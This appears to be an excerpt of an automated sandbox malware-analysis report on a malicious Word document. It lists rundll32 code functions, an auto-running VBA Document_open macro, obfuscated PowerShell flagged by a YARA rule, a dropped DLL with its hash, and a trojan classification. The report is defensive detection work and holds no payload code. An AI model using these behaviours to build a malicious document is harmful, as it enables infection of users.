Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00203FAB	10_2_00203FAB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002067AC	10_2_002067AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0021CBB0	10_2_0021CBB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020FFB5	10_2_0020FFB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002059B8	10_2_002059B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020EF80	10_2_0020EF80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00208994	10_2_00208994
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00203B97	10_2_00203B97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0021B19F	10_2_0021B19F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002139E1	10_2_002139E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002033F4	10_2_002033F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020B7F8	10_2_0020B7F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020C3C2	10_2_0020C3C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A4460	11_2_006A4460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A0065	11_2_006A0065
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A1079	11_2_006A1079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069E871	11_2_0069E871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069C44B	11_2_0069C44B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00697C4A	11_2_00697C4A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00693C28	11_2_00693C28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00696005	11_2_00696005
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069A4E1	11_2_0069A4E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A5CCB	11_2_006A5CCB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069BCA5	11_2_0069BCA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006AC48F	11_2_006AC48F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069E499	11_2_0069E499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A9494	11_2_006A9494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A7D78	11_2_006A7D78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006ABD5E	11_2_006ABD5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069415F	11_2_0069415F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00696D2C	11_2_00696D2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00693521	11_2_00693521
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069DD24	11_2_0069DD24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A5136	11_2_006A5136
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069510E	11_2_0069510E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A1913	11_2_006A1913
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A2DE1	11_2_006A2DE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A41AD	11_2_006A41AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006975A0	11_2_006975A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00694DB8	11_2_00694DB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006AB59B	11_2_006AB59B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006AA59F	11_2_006AA59F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00697D94	11_2_00697D94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069CA68	11_2_0069CA68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00696A6F	11_2_00696A6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069367A	11_2_0069367A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A8279	11_2_006A8279
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A1E7D	11_2_006A1E7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A6E50	11_2_006A6E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00690A00	11_2_00690A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A2A00	11_2_006A2A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006B1600	11_2_006B1600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00692A18	11_2_00692A18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A96EA	11_2_006A96EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A8EE2	11_2_006A8EE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00696EE4	11_2_00696EE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069D2C9	11_2_0069D2C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069C6CE	11_2_0069C6CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A06D1	11_2_006A06D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A6AD5	11_2_006A6AD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A66AE	11_2_006A66AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A02A0	11_2_006A02A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00695EBA	11_2_00695EBA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006B12B6	11_2_006B12B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006906B6	11_2_006906B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069628A	11_2_0069628A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069D760	11_2_0069D760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A4F60	11_2_006A4F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A4B48	11_2_006A4B48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00695742	11_2_00695742
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00691B46	11_2_00691B46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A2B45	11_2_006A2B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069CF5B	11_2_0069CF5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00698355	11_2_00698355
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069AF28	11_2_0069AF28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A473C	11_2_006A473C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069FB05	11_2_0069FB05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069EF04	11_2_0069EF04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A7713	11_2_006A7713
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00698B16	11_2_00698B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A9BE4	11_2_006A9BE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069ABF8	11_2_0069ABF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006977F0	11_2_006977F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006927F4	11_2_006927F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069B7C2	11_2_0069B7C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006933AB	11_2_006933AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00695BAC	11_2_00695BAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069A7A2	11_2_0069A7A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006ABFB0	11_2_006ABFB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069F3B5	11_2_0069F3B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069E380	11_2_0069E380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00692F97	11_2_00692F97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00716C05	12_2_00716C05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00716E8A	12_2_00716E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071E360	12_2_0071E360
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00725748	12_2_00725748
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072533C	12_2_0072533C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00714121	12_2_00714121
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00719716	12_2_00719716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071FB04	12_2_0071FB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007183F0	12_2_007183F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072A7E4	12_2_0072A7E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00724DAD	12_2_00724DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072C19B	12_2_0072C19B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071F471	12_2_0071F471
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00721C79	12_2_00721C79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071427A	12_2_0071427A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00728E79	12_2_00728E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00722A7D	12_2_00722A7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00725060	12_2_00725060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00720C65	12_2_00720C65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071D668	12_2_0071D668
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071766F	12_2_0071766F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00727A50	12_2_00727A50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071D04B	12_2_0071D04B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071884A	12_2_0071884A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00714828	12_2_00714828
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00713618	12_2_00713618
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00711600	12_2_00711600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00723600	12_2_00723600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00729AE2	12_2_00729AE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071B0E1	12_2_0071B0E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00717AE4	12_2_00717AE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072A2EA	12_2_0072A2EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007212D1	12_2_007212D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007276D5	12_2_007276D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071DEC9	12_2_0071DEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007268CB	12_2_007268CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071D2CE	12_2_0071D2CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007112B6	12_2_007112B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00716ABA	12_2_00716ABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00720EA0	12_2_00720EA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071C8A5	12_2_0071C8A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007272AE	12_2_007272AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072A094	12_2_0072A094
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071F099	12_2_0071F099
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072D08F	12_2_0072D08F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00728978	12_2_00728978
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00725B60	12_2_00725B60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00718F55	12_2_00718F55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071DB5B	12_2_0071DB5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072C95E	12_2_0072C95E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00714D5F	12_2_00714D5F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00716342	12_2_00716342
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00712746	12_2_00712746
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00723745	12_2_00723745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00725D36	12_2_00725D36
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071E924	12_2_0071E924
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071BB28	12_2_0071BB28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071792C	12_2_0071792C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00728313	12_2_00728313
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00722513	12_2_00722513
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00720705	12_2_00720705
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00715D0E	12_2_00715D0E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007133F4	12_2_007133F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071B7F8	12_2_0071B7F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007239E1	12_2_007239E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071C3C2	12_2_0071C3C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072CBB0	12_2_0072CBB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071FFB5	12_2_0071FFB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007159B8	12_2_007159B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007181A0	12_2_007181A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071B3A2	12_2_0071B3A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00713FAB	12_2_00713FAB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007167AC	12_2_007167AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00718994	12_2_00718994
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00713B97	12_2_00713B97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072B19F	12_2_0072B19F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071EF80	12_2_0071EF80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D6005	13_2_001D6005
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D3C28	13_2_001D3C28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DC44B	13_2_001DC44B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D7C4A	13_2_001D7C4A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E1079	13_2_001E1079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DE871	13_2_001DE871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E0065	13_2_001E0065
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E4460	13_2_001E4460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DE499	13_2_001DE499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E9494	13_2_001E9494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001EC48F	13_2_001EC48F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DBCA5	13_2_001DBCA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E5CCB	13_2_001E5CCB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DA4E1	13_2_001DA4E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E1913	13_2_001E1913
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D510E	13_2_001D510E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E5136	13_2_001E5136
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D6D2C	13_2_001D6D2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DDD24	13_2_001DDD24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D3521	13_2_001D3521
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001EBD5E	13_2_001EBD5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D415F	13_2_001D415F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E7D78	13_2_001E7D78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001EA59F	13_2_001EA59F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001EB59B	13_2_001EB59B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D7D94	13_2_001D7D94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D4DB8	13_2_001D4DB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E41AD	13_2_001E41AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D75A0	13_2_001D75A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E2DE1	13_2_001E2DE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D2A18	13_2_001D2A18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D0A00	13_2_001D0A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E2A00	13_2_001E2A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F1600	13_2_001F1600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E6E50	13_2_001E6E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E1E7D	13_2_001E1E7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D367A	13_2_001D367A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E8279	13_2_001E8279
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D6A6F	13_2_001D6A6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DCA68	13_2_001DCA68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D628A	13_2_001D628A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D5EBA	13_2_001D5EBA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F12B6	13_2_001F12B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D06B6	13_2_001D06B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E66AE	13_2_001E66AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E02A0	13_2_001E02A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E6AD5	13_2_001E6AD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E06D1	13_2_001E06D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DC6CE	13_2_001DC6CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DD2C9	13_2_001DD2C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E96EA	13_2_001E96EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D6EE4	13_2_001D6EE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E8EE2	13_2_001E8EE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D8B16	13_2_001D8B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E7713	13_2_001E7713
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DFB05	13_2_001DFB05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DEF04	13_2_001DEF04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E473C	13_2_001E473C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DAF28	13_2_001DAF28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DCF5B	13_2_001DCF5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D8355	13_2_001D8355
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E4B48	13_2_001E4B48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D1B46	13_2_001D1B46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E2B45	13_2_001E2B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D5742	13_2_001D5742
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DD760	13_2_001DD760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E4F60	13_2_001E4F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D2F97	13_2_001D2F97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DE380	13_2_001DE380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DF3B5	13_2_001DF3B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001EBFB0	13_2_001EBFB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D5BAC	13_2_001D5BAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D33AB	13_2_001D33AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DA7A2	13_2_001DA7A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DB7C2	13_2_001DB7C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DABF8	13_2_001DABF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D27F4	13_2_001D27F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D77F0	13_2_001D77F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E9BE4	13_2_001E9BE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00216C05	14_2_00216C05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00216E8A	14_2_00216E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00214121	14_2_00214121
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0022533C	14_2_0022533C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0021FB04	14_2_0021FB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00219716	14_2_00219716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0021E360	14_2_0021E360
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00225748	14_2_00225748
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00214D5F	14_2_00214D5F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00224DAD	14_2_00224DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0022C19B	14_2_0022C19B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0022A7E4	14_2_0022A7E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_002183F0	14_2_002183F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00214828	14_2_00214828
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00211600	14_2_00211600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00223600	14_2_00223600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00213618	14_2_00213618
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00225060	14_2_00225060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00220C65	14_2_00220C65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0021D668	14_2_0021D668
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0021766F	14_2_0021766F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0021F471	14_2_0021F471
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00221C79	14_2_00221C79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0021427A	14_2_0021427A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00228E79	14_2_00228E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00222A7D	14_2_00222A7D

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: Doc.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module R4bm01nsbtdt1, Function Document_open			Name: Document_open

Document contains embedded VBA macros

Source: Doc.doc

OLE indicator, VBA macros: true

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll 5E9F4504B7E0938A2B2EB9A7F090BE9F4B1101AA3BE145A3B5895CB14BACD0EF

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: String function: 1000B078 appears 46 times

Yara signature match

Source: 00000005.00000002.2093207161.0000000001CB4000.00000004.00000040.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2093170388.00000000002B6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Source: Yvtlx6p4.dll.5.dr

Static PE information: Section: .rsrc ZLIB complexity 0.999343417553

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.evad.winDOC@30/9@1/4

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 17_2_002E6686 CreateToolhelp32Snapshot,

17_2_002E6686

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$Doc.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC35E.tmp

Jump to behavior

Source: Doc.doc

OLE indicator, Word Document stream: true

Source: Doc.doc	OLE document summary: title field not present or empty
Source: Doc.doc	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ............,........................... .<.......<.....................H...............#...............................h.......5kU.............	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ............,...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K........~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v............0.r.............................................	Jump to behavior
